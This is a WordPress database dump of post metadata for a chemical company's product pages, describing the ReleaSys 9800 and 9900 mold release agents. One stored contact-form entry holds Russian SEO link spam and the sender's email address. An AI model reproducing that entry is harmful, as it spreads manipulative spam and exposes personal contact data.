INSERT INTO `wp_postmeta` VALUES (38290, 4326, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (38291, 4326, '317_default_editor', 'One Gallon, 5 Gallon, and 55 Gallon Drum'); 
INSERT INTO `wp_postmeta` VALUES (38292, 4326, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (38293, 4326, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (38294, 4326, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (38295, 4326, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (38296, 4326, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (38297, 4326, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (38298, 4326, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (38299, 4326, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (38300, 4326, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (38301, 4326, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (38302, 4326, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (38303, 4326, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (38304, 4326, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (38305, 4326, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (38306, 4326, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (38307, 4326, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (38308, 4326, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (38309, 4326, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (38310, 4326, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (38311, 4326, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (38312, 4326, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (38313, 4326, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (38314, 4326, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (38315, 4326, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (38316, 4326, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (38317, 4326, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (38318, 4326, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (38319, 4326, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (38320, 4326, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (38321, 4326, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (38322, 4326, '_yoast_wpseo_primary_product_cat', '526'); 
INSERT INTO `wp_postmeta` VALUES (38323, 4326, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (38324, 4326, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (38325, 4332, '_wp_attached_file', '2017/05/shutterstock_568596037-e1497628609195.jpg'); 
INSERT INTO `wp_postmeta` VALUES (38326, 4332, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:740;s:6:"height";i:627;s:4:"file";s:49:"2017/05/shutterstock_568596037-e1497628609195.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:49:"shutterstock_568596037-e1497628609195-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_568596037-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_568596037-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:49:"shutterstock_568596037-e1497628609195-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:49:"shutterstock_568596037-e1497628609195-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:49:"shutterstock_568596037-e1497628609195-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:49:"shutterstock_568596037-e1497628609195-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (38327, 4333, '_wp_attached_file', '2017/05/shutterstock_432641509-e1496157095257.jpg'); 
INSERT INTO `wp_postmeta` VALUES (38328, 4333, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:730;s:6:"height";i:520;s:4:"file";s:49:"2017/05/shutterstock_432641509-e1496157095257.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:49:"shutterstock_432641509-e1496157095257-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:49:"shutterstock_432641509-e1496157052394-800x415.jpg";s:5:"width";i:800;s:6:"height";i:415;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:49:"shutterstock_432641509-e1496157052394-768x399.jpg";s:5:"width";i:768;s:6:"height";i:399;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:49:"shutterstock_432641509-e1496157095257-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:49:"shutterstock_432641509-e1496157095257-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:49:"shutterstock_432641509-e1496157095257-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:49:"shutterstock_432641509-e1496157095257-510x520.jpg";s:5:"width";i:510;s:6:"height";i:520;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (38329, 4333, '_wp_attachment_backup_sizes', 'a:16:{s:9:"full-orig";a:3:{s:5:"width";i:1000;s:6:"height";i:519;s:4:"file";s:26:"shutterstock_432641509.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:34:"shutterstock_432641509-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:11:"medium-orig";a:4:{s:4:"file";s:34:"shutterstock_432641509-800x415.jpg";s:5:"width";i:800;s:6:"height";i:415;s:9:"mime-type";s:10:"image/jpeg";}s:17:"medium_large-orig";a:4:{s:4:"file";s:34:"shutterstock_432641509-768x399.jpg";s:5:"width";i:768;s:6:"height";i:399;s:9:"mime-type";s:10:"image/jpeg";}s:30:"display_product_thumbnail-orig";a:4:{s:4:"file";s:34:"shutterstock_432641509-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:34:"shutterstock_432641509-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:34:"shutterstock_432641509-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:34:"shutterstock_432641509-510x519.jpg";s:5:"width";i:510;s:6:"height";i:519;s:9:"mime-type";s:10:"image/jpeg";}s:18:"full-1496157095257";a:3:{s:5:"width";i:1000;s:6:"height";i:519;s:4:"file";s:41:"shutterstock_432641509-e1496157052394.jpg";}s:23:"thumbnail-1496157095257";a:4:{s:4:"file";s:49:"shutterstock_432641509-e1496157052394-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:20:"medium-1496157095257";a:4:{s:4:"file";s:49:"shutterstock_432641509-e1496157052394-800x415.jpg";s:5:"width";i:800;s:6:"height";i:415;s:9:"mime-type";s:10:"image/jpeg";}s:26:"medium_large-1496157095257";a:4:{s:4:"file";s:49:"shutterstock_432641509-e1496157052394-768x399.jpg";s:5:"width";i:768;s:6:"height";i:399;s:9:"mime-type";s:10:"image/jpeg";}s:39:"display_product_thumbnail-1496157095257";a:4:{s:4:"file";s:49:"shutterstock_432641509-e1496157052394-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:28:"shop_thumbnail-1496157095257";a:4:{s:4:"file";s:49:"shutterstock_432641509-e1496157052394-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:26:"shop_catalog-1496157095257";a:4:{s:4:"file";s:49:"shutterstock_432641509-e1496157052394-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:25:"shop_single-1496157095257";a:4:{s:4:"file";s:49:"shutterstock_432641509-e1496157052394-510x519.jpg";s:5:"width";i:510;s:6:"height";i:519;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (38330, 4334, '_wp_attached_file', '2017/05/ReleaSys-9800.pdf'); 
INSERT INTO `wp_postmeta` VALUES (38331, 4326, '318_custom_list_file', 'a:1:{s:32:"68b8dd68a40a7946fb2e6e3c5bb4c61b";a:3:{s:4:"name";s:13:"ReleaSys 9800";s:4:"file";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2017/05/ReleaSys-9800.pdf";s:4:"desc";s:33:"Advanced Composites-ReleaSys 9800";}}'); 
INSERT INTO `wp_postmeta` VALUES (38332, 4326, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (38333, 4326, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (38334, 4326, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (38335, 4326, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (38336, 4326, '_ywtm_content_tab_description', '<h2>ReleaSys 9800™ Mold Release Coating</h2>\r\n<h3>Advanced Chemistry for Advanced Materials</h3>\r\nReleaSys 9800 mold release coating delivery sophisticated technology to today;s modern molding industries with an alternative to the traditional “shop-spray” or high volume, apply-every-cycle release agent. Miller-Stephenson has been at the forefront in developing the most effective products of this type and transitioning industries to these formulations for their molding processes as appropriate. We have focused on taking the message to our customers that "more is not necessarily better" when it comes to applying mold release agents. Today’s highly sophisticated water-based semi-permanent mold release coating technologies do more with less.  Our ReleaSys 9800 delivers the following benefits:\r\n<ul>\r\n 	<li>Excels at de-molding advanced composites and aggressive substrates</li>\r\n 	<li>Ideal for highly-polished; complex mold</li>\r\n 	<li>Tenacious adhesion to all molding surface</li>\r\n 	<li>Extended re-application intervals</li>\r\n 	<li>Rapid Cure; no heat required</li>\r\n 	<li>Minimal build-up and mold fouling</li>\r\n 	<li>Eco-friendly Water-based formulation</li>\r\n</ul>\r\nOur unique chemistry provides a mold release which exceeds the rigorous demands of manufacturing today\'s advanced composites and substrates. This proprietary chemistry comes in an eco-friendly, no VOC formulation and requires no extended cure times.  ReleaSys 9800 mold release coating forms an immediate, tenacious bond to the mold surface upon drying.  ReleaSys 9800 provides a simple, yet sophisticated mold release chemistry, designed for all high performance composites used in compression molding, resin transfer, vacuum bagging, filament-winding, mandrel-built, hand and spray layup processes. etc. This robust formulation excels equally well with other forms of molding and materials, and can be used to release more typical substrate such as polyurethane, thermoplastics, rubber/elastomers, and fiberglass. The advanced chemistry within ReleaSys 9800 holds tremendous utility and applicators will see the immediate effects.\r\n<ul>\r\n 	<li>Molded parts can be post-painted or glued with little or no surface preparation</li>\r\n 	<li>Decreased cost of scrap and waste.</li>\r\n 	<li>Reduced frequency of equipment maintenance and replacement</li>\r\n 	<li>Ability to restore and extend the life of your equipment</li>\r\n 	<li>Improved mold integrity, surface quality and throughput</li>\r\n 	<li>Low product application levels result in a cleaner working environment</li>\r\n</ul>\r\nMiller-Stephenson experts have spent years focusing on how to improve composite molding operations by increasing efficiency, reducing waste and enhancing finished part quality. We have formulated several specialty mold release agents for just that purpose. As a leader in the development of water-based products, Miller-Stephenson ReleaSys product line offers environmentally conscious technology for composite molders who require the same, uncompromised high levels of quality and performance as found in traditional solvent-based products.\r\n\r\nMiller-Stephenson has had a long history in composite molding industries, and our ReleaSys brand of products are respected around the world for quality and reliability. When you purchase Miller-Stephenon ReleaSys Semi-Permanent mold release agents you not only get industry leading products, you also gain access to our many years of direct production floor experience. We understand your production issues and can help you optimize your mold preparation, maintenance and release processes to improve your bottom line.\r\n\r\n<a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For help with application or troubleshooting concerns while using ReleaSys.</strong></a>\r\n\r\n<strong><a href="https://www.miller-stephenson.com/mold-release-agents/">Click here for information, Which mold release agent is right for you</a></strong>'); 
INSERT INTO `wp_postmeta` VALUES (38337, 4326, '_yoast_wpseo_focuskw_text_input', 'Mold Release Coating'); 
INSERT INTO `wp_postmeta` VALUES (38338, 4326, '_yoast_wpseo_focuskw', 'Mold Release Coating'); 
INSERT INTO `wp_postmeta` VALUES (38339, 4326, '_yoast_wpseo_title', 'Mold Release Coating | Advanced Release Agent Chemistry | ReleaSys 9800'); 
INSERT INTO `wp_postmeta` VALUES (38340, 4326, '_yoast_wpseo_metadesc', 'ReleaSys 9800 is Miller-Stephensons most advanced mold release coating, utilizing sophisticated, high-crosslinking release agent formulations.'); 
INSERT INTO `wp_postmeta` VALUES (38341, 4326, '_yoast_wpseo_linkdex', '96'); 
INSERT INTO `wp_postmeta` VALUES (38342, 4336, '_edit_lock', '1497637493:3'); 
INSERT INTO `wp_postmeta` VALUES (38343, 4336, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (38344, 4337, '_wp_attached_file', '2017/05/shutterstock_528597541.jpg'); 
INSERT INTO `wp_postmeta` VALUES (38345, 4337, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2017/05/shutterstock_528597541.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_528597541-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_528597541-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_528597541-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_528597541-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_528597541-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_528597541-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_528597541-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (38346, 4336, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (38347, 4336, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (38348, 4336, '_thumbnail_id', '4337'); 
INSERT INTO `wp_postmeta` VALUES (38349, 4336, '312_default_editor', '<strong>Physical Properties:</strong>\r\n<table width="385">\r\n<tbody>\r\n<tr>\r\n<td width="111">Primary Polymer</td>\r\n<td width="159">Crosslinking Polysiloxane</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td>White Emulsion</td>\r\n</tr>\r\n<tr>\r\n<td>Odor</td>\r\n<td>None</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td>1.0 g/mL</td>\r\n</tr>\r\n<tr>\r\n<td>Flash Point</td>\r\n<td>None</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (38350, 4336, '716_default_editor', '<strong>Release Agent Applications:</strong>\r\n\r\nReleaSys 9800 is formulated to provide unmatched utility in compression, injection and transfer molding with the following materials. <a href="https://www.miller-stephenson.com/troubleshooting-common-molding-issues/">For help with application or troubleshooting concerns while using ReleaSys.</a>\r\n<table width="640">\r\n<tbody>\r\n<tr>\r\n<td width="167">•       Organic Polymers</td>\r\n<td width="168">•          Thermoplastics</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•       Thermosetting resins</td>\r\n<td width="168">•          Elastomers (Natural and Synthetic)</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•       FRP Composites</td>\r\n<td width="168">•          Epoxies</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•       Non-gel Polyester</td>\r\n<td width="168">•          Polyurethane / TPU</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•       Rotational Molding</td>\r\n<td width="168">•          Adhesives</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (38351, 4336, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (38352, 4336, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (38353, 4336, '317_default_editor', 'One Gallon, 5 Gallon, and 55 Gallon Drum'); 
INSERT INTO `wp_postmeta` VALUES (38354, 4336, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (38355, 4336, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (38356, 4336, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (38357, 4336, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (38358, 4336, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (38359, 4336, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (38360, 4336, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (38361, 4336, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (38362, 4336, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (38363, 4336, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (38364, 4336, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (38365, 4336, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (38366, 4336, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (38367, 4336, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (38368, 4336, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (38369, 4336, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (38370, 4336, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (38371, 4336, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (38372, 4336, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (38373, 4336, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (38374, 4336, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (38375, 4336, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (38376, 4336, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (38377, 4336, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (38378, 4336, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (38379, 4336, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (38380, 4336, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (38381, 4336, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (38382, 4336, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (38383, 4336, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (38384, 4336, '_yoast_wpseo_primary_product_cat', '526'); 
INSERT INTO `wp_postmeta` VALUES (38385, 4336, '_yoast_wpseo_focuskw_text_input', 'Fiberglass Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (38386, 4336, '_yoast_wpseo_focuskw', 'Fiberglass Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (38387, 4336, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (38388, 4336, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (38389, 4338, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38390, 4338, '_seq_num', '684'); 
INSERT INTO `wp_postmeta` VALUES (38391, 4338, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38392, 4338, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38393, 4338, '_field_1', 'KennethTexQB'); 
INSERT INTO `wp_postmeta` VALUES (38394, 4338, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (38395, 4338, '_field_2', 'vadimip2dmukhin@mail.ru'); 
INSERT INTO `wp_postmeta` VALUES (38396, 4338, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (38397, 4338, '_field_3', 'Новая историческая эпоха в машиностроении началась с созданием первых двигателей на бензине, которые быстро стали устанавливать во множество механизмов и машин, в том числе и в самые первые трактора. \r\n \r\nИменно благодаря работе такого надёжного двигателя в настоящее время вы можете заказать в Интернете &lt;a href=&quot;https://trak-130.ru/articles&quot;&gt;трубоукладчик тр 20&lt;/a&gt; . Следующим полезным изобретением для тракторов стало изобретение гусениц, как пишет сайт trak-130.ru, стальные гусеницы позволили в сто раз увеличить проходимость тракторов и положили начало их использованию в странах с не самым благоприятным климатом. \r\n \r\nКогда на полях появились современные и эффективные трактора, сельское хозяйство вдруг перестало нуждаться в таком значительном объёме ручного труда. И поэтому сотни миллионов человек освободились от тяжёлой работы и были вынуждены искать себе иную сферу занятости. И нередко такими местами становились новые заводы и фабрики, что начали массово строить во многих регионах.'); 
INSERT INTO `wp_postmeta` VALUES (38398, 4338, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38399, 4338, '_sub_id', '4338'); 
INSERT INTO `wp_postmeta` VALUES (38400, 4339, '_wp_attached_file', '2017/05/ReleaSys-9900.pdf'); 
INSERT INTO `wp_postmeta` VALUES (38401, 4336, '318_custom_list_file', 'a:1:{s:32:"d9f477c4f8607f24a3db3a5f3692d56e";a:3:{s:4:"name";s:17:"ReleaSys 9900 TDS";s:4:"file";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2017/05/ReleaSys-9900.pdf";s:4:"desc";s:37:"FRP Composite Release - ReleaSys 9900";}}'); 
INSERT INTO `wp_postmeta` VALUES (38402, 4336, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (38403, 4336, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (38404, 4336, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (38405, 4336, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (38406, 4336, '_ywtm_content_tab_description', '<h2>ReleaSys™ 9900 Fiberglass Release Agent</h2>\r\n<h3>Sophisticated Chemical Solutions for Composite/FRP Molding Applications</h3>\r\nReleaSys 9900 Fiberglass release agent is a water-based release agent which utilizes a proprietary polymeric backbone that generates a mold coating that binds tenaciously to mold surfaces providing a durable thin film with excellent surface slip and ease of  release.  ReleaSys 9900 is ideally suited for reinforced polyester (FRP) composites due to its high slip coating, which cures quickly and provides multiple releases for low VOC polyester gel-coat and other tough releasing polyester structures. ReleaSys 9900 functions equally well for the release of epoxies, polyester resins, vinyl ester resins, thermoplastics, adhesives, and rotationally molded plastics. <span style="text-decoration: underline;">ReleaSys 9900 Fiberglass release agent</span> is particularly well suited for tougher to release processes such as filament winding and non gel coated polyester and fiberglass molding. Benefits of ReleaSys 9900 include:\r\n<ul>\r\n 	<li>Rapid Cure; High crosslinking</li>\r\n 	<li>Superior mold adherence and durability</li>\r\n 	<li>Exceptional utility across a broad range of substrates</li>\r\n 	<li>Ideally suited for FRP composites and Thermoplastics</li>\r\n 	<li>Improves part quality; Protects mold surface</li>\r\n 	<li>Eco-friendly Waterbased formulation</li>\r\n 	<li>Low odor; No VOC</li>\r\n</ul>\r\n<h3>Miller-Stephenson Specializes in the Development of High-Performance Mold Release Solutions</h3>\r\nReleaSys 9900 Fiberglass release agent was developed in direct response to our customers needs.  They needed a mold release agent that was not only water-based but also could cure rapidly without the need for lengthy cure times or high heat exposure. Putting over 50 years of mold release expertise to use, Miller-Stephenson chemist developed a revolutionary product which not only has a rapid cure profile (even at room temperature) but displays superior abrasion resistance without sacrificing surface slip.  This translated to a mold release agent which can release numerous parts without application regardless of the substrate, while simultaneous increasing part quality and minimizing mold release agent transfer. The advanced chemistry within ReleaSys 9800 holds tremendous utility and applicators will see the immediate effects.\r\n<ul>\r\n 	<li>Molded parts can be post-painted or glued with little or no surface preparation</li>\r\n 	<li>Decreased cost of scrap and waste.</li>\r\n 	<li>Reduced frequency of equipment maintenance and replacement</li>\r\n 	<li>Ability to restore and extend the life of your equipment</li>\r\n 	<li>Improved mold integrity, surface quality and throughput</li>\r\n 	<li>Low product application levels result in a cleaner working environment</li>\r\n</ul>\r\n<h3>50+ years of Industry Expertise at your service</h3>\r\nMiller-Stephenson has had a long history in composite molding industries, and our ReleaSys brand of products are respected around the world for quality and reliability. When you purchase Miller-Stephenon ReleaSys Semi-Permanent mold release agents you not only get industry leading products, you also gain access to our many years of direct production floor experience. We understand your production issues and can help you optimize your mold preparation, maintenance and release processes to improve your bottom line.\r\n\r\n<a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For help with application or troubleshooting concerns while using ReleaSys.</strong></a>\r\n\r\n<strong><a href="https://www.miller-stephenson.com/mold-release-agents/">Click here for information, Which mold release agent is right for you</a></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (38407, 4336, '_yoast_wpseo_title', 'Fiberglass Release Agent | Composite/FRP Molding Applications | ReleaSys 9900'); 
INSERT INTO `wp_postmeta` VALUES (38408, 4336, '_yoast_wpseo_metadesc', 'ReleaSys 9900 Fiberglass release agent is designed for Composite/FRP Molding Applications featuring advanced chemistries and water-based formulations.'); 
INSERT INTO `wp_postmeta` VALUES (38409, 4340, '_wp_attached_file', '2017/05/shutterstock_388748860.jpg'); 
